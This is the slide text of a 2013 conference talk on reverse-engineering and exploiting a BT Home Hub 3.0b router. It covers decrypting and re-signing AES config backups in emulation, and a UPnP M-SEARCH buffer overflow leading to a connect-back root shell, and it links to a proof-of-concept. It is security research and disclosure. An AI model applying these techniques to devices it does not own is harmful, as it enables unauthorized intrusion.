BT CPE Devices - Amazon S3s3.amazonaws.com/zcutlip_storage/Reversing and Exploiting BT CPE Devices -...

BT CPE Devices:Adventures in Reversing and Exploiting

Reversing and Exploiting BT CPE Devices - Cutlip - BayThreat.key - December 7, 2013

• Zachary Cutlip

• Senior Vulnerability Researcher Tactical Network Solutions, LLC


Home Hub 3.0bReversing and Exploiting BT CPE Devices - Cutlip - BayThreat.key - December 7, 2013

Home Hub 3.0b (back)Reversing and Exploiting BT CPE Devices - Cutlip - BayThreat.key - December 7, 2013

Home Hub 3.0b

Manufacturer Huawei

CPUBroadcom BCM6361

Dual core 400 MHz MIPS32

RAM 64 MB DDR2 800 SDRAM

Flash Storage 32 MB NAND Flash, TSOP48 Package

OS Linux 2.6.30


Firmware managed by ISPReversing and Exploiting BT CPE Devices - Cutlip - BayThreat.key - December 7, 2013

Backstory

• forum.kitz.co.uk users wanted to hack their modems

• Forum user emailed, requesting help

• Shipped me hardware

• Another user had already extracted firmware


Goal

• Overall goal:

• Unlock HH3b configuration options, and/or

• Immediate goal

• Get interactive root prompt


Attack Surface

• Web interface

• UPnP

• Configuration backup file


Command injection

• Common in SOHO routers

• Unsanitized input + system()

• Easy to discover/exploit

• Portable

• Can be limited


Example: Trendnet TEW-654TR


Injecting shell commands: You can do it, too!


Investigating

• grep for strings with shell-style redirects

• i.e. “%s %s > /dev/null”

• Verify which, if any:

• Are passed to a shell invocation

• Are combined with user-supplied input


Promising lead

• HH3b’s ‘cms’ application

• Gets executed by web server

• executes lots of commands, e.g. iptables

• Lots of “shell-like” strings, such as....


“My God. It’s full of %s.”Reversing and Exploiting BT CPE Devices - Cutlip - BayThreat.key - December 7, 2013

iptables %s -%c %s %s %s %s %s %s %s %s %s %s %s 2>/dev/null

Twelve input strings.

Seriously. We’re done. Time for beers.

Shell redirect


Do we have command injection?

• Unsanitized user input?

• That may be hard to verify

• First, verify how this gets executed


HH3b command execution


HH3b command execution

• Command string generated with snprintf()

• Passed to QosExec()

• Passed to ATP_Util_ExecCmdNoHang()


ATP_UtilExecCmdNoHang


• WHAT...

• Parse command string into array

• Open file referenced by shell redirect


• THE...

• fork()

• dup2() the opened redirect

• execv() command

• wait()


• FUCK.

• No “/bin/sh -c”


Well played, BT


Config backup• Assumed to be well formed -->Memory

corruption?

• If parsed by a shell script, command injection

• Options in the configuration grammar, but hidden from the GUI

• Undocumented backdoor credentials?

• Enable SSH?


Config backup

• Usually obfuscated for tamper-resistance

• Encrypted

• Robust, well-known encryption

• Custom “encryption”

• Signed


Encrypted config• Custom encryption implementations

• Often not mindful of cryptography principles

• May be reverse engineered and re-implemented

• Strong, well known implementations

• Algorithms are sound

• If keys are protected, not easily defeated


HH3b uses AES for encrypting configs


Encrypted config

• HH3b uses AES

• Assumed unique per-user/per-device keys

• Almost didn’t analyze, not worth it


Encrypted Config

• But wait...

• A new modem should restore an old backup

• I had two HH3bs, so I tried it...

• ....And it worked!


Config import/export

• Reversed config import/export API

• XML data

• compressed with ‘gzip’

• AES encrypted

• Base-64 encoded

• 128-bit AES signature prepended


Signature check, then decryption


Config import API

• ATP_CFM_ExtDigVerifyFile

• Checks & removes signature

• ATP_CFM_ExtCustomImportEncryptedUserCfgFile

• Base64 decode

• Decrypt

• Decompress with ‘gunzip’


Straightforward APIReversing and Exploiting BT CPE Devices - Cutlip - BayThreat.key - December 7, 2013

QEMU first attempt

• Cross compile decryption tool

• link against libcfmapi.so

• Run in QEMU MIPS emulator

• Weird dynamic linker errors

• Missing functions, like:

• PZMM_K_Fun2()


Missing functions

• Linker can’t find several functions

• Strings analysis finds them in unrelated libs

• PZMM_K_Fun1-4 build AES key

• PZMM_I_Fun1-4 build AES IV


QEMU second attempt

• LD_PRELOAD various libs

• Run in QEMU again

• Success! Decrypted config file


Decrypted configReversing and Exploiting BT CPE Devices - Cutlip - BayThreat.key - December 7, 2013

Re-encrypt, re-sign

• Reverse the process

• Modify config file

• Call encryption & signing functions

• Upload to HH3b

• Success!


Snagged AES Key

Because why not?


No attack vectors in the config file


Default configuration

• Same trick applies to defaultcfg.xml

• Many more configuration options

• Remote admin creds, etc

• Schema incompatible with backup config

• Modifying and uploading was not successful


Buffer Overflows

• No easy 1996-style bugs

• Highly unusual for SOHO routers

• One exception…


Shaky program

• One binary was promising: ‘bcmupnp’

• Lots of use of sprintf(),strcpy(), etc.

• Hard to analyze: didn’t disassemble cleanly

• Lots of functions with no x-refs.

• Lots of jump tables


Dynamic analysis

• Static analysis is frustrated by poor disassembly

• Need to run & debug for dynamic analysis

• QEMU

• Tutorial: http://bit.ly/15pCvSy


Emulation problems• ‘bcmupnp’: UPnP server that manages

wireless hardware

• Provided by Broadcom

• Won’t run in emulated environment

• Assumptions about hardware that is present

• NVRAM unavailable for configuration queries


Emulation problems

• Wrote an NVRAM ‘faker’ library:

• https://github.com/zcutlip/nvram-‐faker

• Provides responses to nvram_get() queries

• INI-style configuration file


Emulation problems

• With NVRAM solved, ‘bcmupnp’ runs

• Just idles

• No response to M-SEARCH queries

• More reverse engineering


Binary Patching

• With no hardware to manage, M-SEARCHes are ignored

• A field in a global struct gets modified if there’s no wireless hardware

• Binary patched out the modification


Before and After


Emulation success

• NVRAM Faked

• Patched hardware check

• ‘bcmupnp’ runs and responds to M-SEARCH!


A bug and a crash

• strcpy() of ST:uuid: from M-SEARCH

• Excessively long uuid string crashes ‘bcmupnp’


ST:uuid buffer overflow


Custom M-SEARCH


CRASH!!

jr to 0x41414141 == pwnage


MIPS Buffer Overflows

• Black Hat 2012

• “From SQL Injection to MIPS Overflows”

•https://vimeo.com/64809593


Bowcaster

• Exploit Development Framework

• Python

• Lightweight

• Buffer overflow API

• MIPS/Linux-specific payloads

• Useful utilities


Bowcaster

https://github.com/zcutlip/bowcaster


Develop exploit

• Buffer overflow via single multicast packet

• Made easy(ier) with Bowcaster

• Root shell via connect-back payload

• Tested against ‘bcmupnp’ in QEMU


Tested against live device

Root prompt on the first try.


Proof-of-Concept Exploit: !

http://github.com/zcutlip/exploit-‐poc


Root or it didn’t happen.


Future Work

• Still no unlock yet

• Bricked a HH3b after rooting

• Need a firmware update file for recovery

• Need to evade filesystem integrity check


Future Work

• HomeHub 4

• Need to extract firmware

• Tiny flash chip

• BGA form factor


Acknowledgments

• Craig Heffner

• Tactical Network Solutions

• William Kirby

• kitz.co.uk user ‘asbokid’

• PsiDOC.com user ‘dmcdonnell’


Resources

http://goo.gl/lzjx7C [shadow-‐file.blogspot.com]


• Talk to me:

• [email protected]


• @zcutlip on Twitter

• http://shadow-file.blogspot.com


Questions?


• Talk to me:



• @zcutlip on Twitter

• http://shadow-file.blogspot.com


BT CPE Devices - Amazon S3s3.amazonaws.com/zcutlip_storage/Reversing and Exploiting BT CPE Devices -...

Documents

Transcript of BT CPE Devices - Amazon S3s3.amazonaws.com/zcutlip_storage/Reversing and Exploiting BT CPE Devices -...